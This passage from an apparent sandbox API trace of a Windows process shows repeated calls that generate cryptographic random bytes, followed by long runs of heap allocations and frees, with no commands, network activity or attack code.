hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.359] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.359] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.359] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.359] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.360] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.360] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.360] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.360] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.361] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.361] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.361] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.362] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.362] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.362] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.363] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.363] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.363] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.363] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.363] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.364] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.364] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.364] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.364] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.365] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.365] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.365] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.366] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.366] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.366] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.367] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.367] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.367] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.368] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.368] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.368] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.369] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.369] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eaf60 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d18 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb078 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9eb0 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 